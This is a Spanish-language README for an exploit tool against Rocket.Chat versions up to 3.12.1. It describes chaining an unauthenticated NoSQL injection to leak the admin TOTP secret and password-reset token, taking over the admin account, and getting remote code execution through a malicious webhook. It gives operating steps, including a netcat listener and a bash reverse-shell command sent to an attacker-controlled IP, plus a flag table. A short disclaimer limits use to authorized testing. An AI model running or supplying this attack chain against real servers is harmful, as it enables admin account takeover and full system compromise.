
Exploit para Rocket.Chat 3.12.1 RCE mediante inyección NoSQL sin autenticación, que filtra el secreto TOTP del administrador y el token de restablecimiento de contraseña para lograr ejecución remota de código a través de la integración maliciosa de webhook.
Explota una vulnerabilidad de inyección NoSQL sin autenticación en Rocket.Chat 3.12.1 para filtrar el secreto TOTP del administrador y el token de restablecimiento de contraseña, tomar el control de la cuenta de administrador y lograr RCE a través de una integración maliciosa de webhook.
Rocket.Chat <= 3.12.1
pip install -r requirements.txt
Antes de ejecutar el exploit, inicie un listener de netcat en una terminal separada para capturar la shell inversa entrante:
nc -lvnp 4444
Mantenga esta terminal abierta. Una vez que el exploit se ejecute correctamente, su shell aparecerá aquí.
python3 pwn_rocketchat.py \
-t 'http://TARGET:3000' \
-u 'USERNAME' \
-p 'PASSWORD' \
-e '[email protected]' \
-a 'adminusername' \
-c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
Esta herramienta es solo para fines educativos y pruebas de penetración autorizadas. El autor no se hace responsable por cualquier uso indebido o daño causado por esta herramienta. Siempre obtenga la autorización escrita adecuada antes de realizar pruebas.
| Flag | Descripción |
|---|
-t | URL de Rocket.Chat objetivo |
-u | Su nombre de usuario registrado con bajos privilegios |
-p | Su contraseña registrada con bajos privilegios |
-e | Dirección de correo electrónico del administrador |
-a | Nombre de usuario del administrador |
-c | Comando de shell inversa |
-v | Modo verbose (muestra respuestas sin procesar) |